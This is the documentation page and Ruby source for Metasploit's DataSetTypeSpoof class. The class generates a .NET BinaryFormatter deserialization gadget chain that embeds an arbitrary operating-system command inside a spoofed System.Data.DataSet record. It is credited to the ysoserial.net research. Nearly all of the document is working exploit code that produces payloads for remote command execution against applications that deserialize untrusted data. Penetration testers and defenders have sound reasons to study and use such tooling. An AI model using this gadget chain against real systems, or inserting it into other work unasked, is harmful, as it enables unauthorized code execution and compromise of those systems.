Class: Msf::Util::DotNetDeserialization::GadgetChains::DataSetTypeSpoof

Inherits:
Types::SerializedStream
Defined in:
lib/msf/util/dot_net_deserialization/gadget_chains/data_set_type_spoof.rb

Class Method Summary

Methods inherited from Types::SerializedStream

from_values, #get_object, #set_object

Class Method Details

.generate(cmd) ⇒ Object

DataSetTypeSpoof — a .NET BinaryFormatter gadget chain that serializes a TextFormattingRunProperties payload for the given command to raw bytes and carries those bytes as the `DataSet.Tables_0` byte-array member of a hand-assembled `System.Data.DataSet` record (with `DataSet.RemotingFormat` set to 1). The record layout follows the ysoserial.net generator referenced below; consult it for the conditions under which a target's DataSet deserialization processes the embedded payload.

Credits:
  Finders: James Forshaw
  Contributors: Soroush Dalili, Markus Wulftange, Jang
References:
  https://github.com/pwntester/ysoserial.net/blob/b486d8bbaed82e1959750ee36f4ab88d91bccc67/ysoserial/Generators/DataSetTypeSpoofGenerator.cs


# File 'lib/msf/util/dot_net_deserialization/gadget_chains/data_set_type_spoof.rb', line 15

# Build the DataSetTypeSpoof gadget chain for +cmd+.
#
# The command is first wrapped in a TextFormattingRunProperties chain, which is
# then serialized to bytes and embedded as the +DataSet.Tables_0+ byte array of
# a hand-assembled System.Data.DataSet record. The member names, binary types
# and additional-info values below reproduce the layout of the referenced
# ysoserial.net generator; records are emitted in stream order (header,
# library records, root class record, the byte array it references, end).
#
# NOTE(review): the DataSet record's +library_id+ points at the mscorlib
# library record while its class name carries an explicit System.Data assembly
# binding; this appears to be the "type spoof" the chain is named for — confirm
# against the referenced generator before changing either value.
#
# @param cmd [String] operating system command handed to the inner
#   TextFormattingRunProperties chain
# @return [Object] the assembled stream returned by +from_values+
#   (a Types::SerializedStream; see the inherited class method)
def self.generate(cmd)
  payload = GadgetChains::TextFormattingRunProperties.generate(cmd)
  payload_bytes = payload.to_binary_s.bytes

  # Library records referenced by the class records below.
  mscorlib_library = Types::RecordValues::BinaryLibrary.new(
    library_id: 2,
    library_name: 'mscorlib'
  )
  system_data_name = Assemblies::VERSIONS['4.0.0.0'].fetch('System.Data').to_s
  system_data_library = Types::RecordValues::BinaryLibrary.new(
    library_id: 3,
    library_name: system_data_name
  )

  # DataSet.RemotingFormat: a System.Data.SerializationFormat enum record whose
  # single Int32 member value__ is 1.
  remoting_format = Types::Record.from_value(
    Types::RecordValues::ClassWithMembersAndTypes.new(
      class_info: Types::General::ClassInfo.new(
        obj_id: -4,
        name: 'System.Data.SerializationFormat',
        member_names: %w[ value__ ]
      ),
      member_type_info: Types::General::MemberTypeInfo.new(
        binary_type_enums: %i{ Primitive },
        additional_infos: [ 8 ]
      ),
      library_id: system_data_library.library_id,
      member_values: [ 1 ]
    )
  )

  # Member layout of the DataSet record: [name, binary type, additional info].
  # String and Object members carry no additional info (nil, dropped below);
  # primitives carry their PrimitiveTypeEnum (1 = Boolean, 8 = Int32, 2 = Byte).
  dataset_members = [
    ['DataSet.RemotingFormat',     :Class,          {type_name: 'System.Data.SerializationFormat', library_id: system_data_library.library_id}],
    ['DataSet.DataSetName',        :String,         nil],
    ['DataSet.Namespace',          :String,         nil],
    ['DataSet.Prefix',             :String,         nil],
    ['DataSet.CaseSensitive',      :Primitive,      1],
    ['DataSet.LocaleLCID',         :Primitive,      8],
    ['DataSet.EnforceConstraints', :Primitive,      1],
    ['DataSet.ExtendedProperties', :Object,         nil],
    ['DataSet.Tables.Count',       :Primitive,      8],
    ['DataSet.Tables_0',           :PrimitiveArray, 2]
  ]
  member_names = dataset_members.map(&:first)
  binary_type_enums = dataset_members.map { |member| member[1] }
  additional_infos = dataset_members.map { |member| member[2] }.compact

  # Values in the same order as dataset_members. Object 5 is an empty string
  # shared by the two following members via references; object 6 is the
  # embedded payload byte array emitted as a separate record below.
  empty_string_ref = Types::Record.from_value(Types::RecordValues::MemberReference.new(id_ref: 5))
  member_values = [
    remoting_format,
    Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(obj_id: 5)),
    empty_string_ref,
    Types::Record.from_value(Types::RecordValues::MemberReference.new(id_ref: 5)),
    false,
    1033,
    false,
    Types::Record.from_value(Types::RecordValues::ObjectNull.new),
    1,
    Types::Record.from_value(Types::RecordValues::MemberReference.new(id_ref: 6))
  ]

  dataset_record = Types::RecordValues::ClassWithMembersAndTypes.new(
    class_info: Types::General::ClassInfo.new(
      obj_id: 1,
      name: 'System.Data.DataSet, System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
      member_names: member_names
    ),
    member_type_info: Types::General::MemberTypeInfo.new(
      binary_type_enums: binary_type_enums,
      additional_infos: additional_infos
    ),
    library_id: mscorlib_library.library_id,
    member_values: member_values
  )

  payload_array = Types::RecordValues::ArraySinglePrimitive.new(
    array_info: {
      obj_id: 6,
      member_count: payload.num_bytes
    },
    primitive_type_enum: Enums::PrimitiveTypeEnum[:Byte],
    members: payload_bytes
  )

  self.from_values([
    Types::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1),
    mscorlib_library,
    system_data_library,
    dataset_record,
    payload_array,
    Types::RecordValues::MessageEnd.new
  ])
end